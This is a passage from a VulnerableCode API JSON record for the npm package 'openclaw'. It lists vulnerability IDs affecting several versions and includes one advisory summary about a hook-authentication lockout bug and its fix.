lnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32971","GHSA-rw39-5899-8mxp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qr66-xgea-tufh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50767?format=json","vulnerability_id":"VCID-qyyn-bw9t-r7c4","summary":"OpenClaw's hooks count non-POST requests toward auth lockout\nOpenClaw's hooks HTTP handler counted hook authentication failures before rejecting unsupported HTTP methods. An unauthenticated client could send repeated non-`POST` requests (for example `GET`) with an invalid token to consume the hook auth failure budget and trigger the temporary lockout window for that client key.\n\nThe fix moves the hook method gate ahead of auth-failure accounting so unsupported methods return `405 Method Not Allowed` without incrementing the hook auth limiter.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/44820dceadac65ac7c0ce8fc0ffba8c2bd9fae89","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/44820dceadac65ac7c0ce8fc0ffba8c2bd9fae89"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-6rmx-gvvg-vh6j","reference_id":"GHSA-6rmx-gvvg-vh6j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6rmx-gvvg-vh6j"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6rmx-gvvg-vh6j","reference_id":"GHSA-6rmx-gvvg-vh6j","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6rmx-gvvg-vh6j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8